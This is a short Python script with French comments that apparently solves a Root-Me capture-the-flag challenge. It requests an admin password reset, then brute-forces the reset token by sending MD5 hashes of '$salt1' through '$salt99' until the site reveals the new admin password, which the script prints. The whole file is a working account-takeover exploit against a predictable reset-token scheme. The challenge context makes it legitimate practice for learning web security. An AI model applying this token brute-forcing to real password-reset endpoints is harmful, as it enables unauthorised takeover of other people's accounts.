# -*- coding: utf-8 -*- # Python 3 import requestsimport hashlib #

1. # -*- coding: utf-8 -*-
2.  
3. # Python 3
4.  
5. import requests
6. import hashlib
7.  
8. # Lien du reset de pass Admin
9. lienChallReset = "http://challenge01.root-me.org/realiste/ch14/?p=forgot_dev&username=admin"
10.  
11. # Lien de test du token
12. lienChallTest = "http://challenge01.root-me.org/realiste/ch14/?p=forgot_dev&username=admin&token="
13.  
14.  
15. hashs = [] # On génère les tableau de MD5 $salt1 à $salt100
16. for i in range(1,100):
17. m = hashlib.md5()
18. m.update(("$salt"+str(i)).encode('utf-8'))
19. hashs.append(m.hexdigest())
20.  
21.  
22. s = requests.Session() # Création de la Sessions
23.  
24. reset = s.get(lienChallReset) # On reset le pass admin
25.  
26. i = 0
27. reussi = False
28.  
29. while(not reussi):
30. r = s.get(lienChallTest+hashs[i]) # On envoie le résultat
31. rep = r.text # On recup
32. if("Token non valable" in rep):
33. print("Raté ! (hash["+str(i)+"]) : "+hashs[i])
34. elif("Votre mot de passe est" in rep):
35. print("---------------------")
36. print("$salt"+str(i+1))
37. print("Réussi ! (hash["+str(i)+"]) : "+hashs[i])
38. passwd = rep.split("passe est : ")[1].split("</span>")[0]
39. print("Password : "+passwd)
40. print("---------------------")
41. reussi = True
42. else:
43. print("Error")
44. i += 1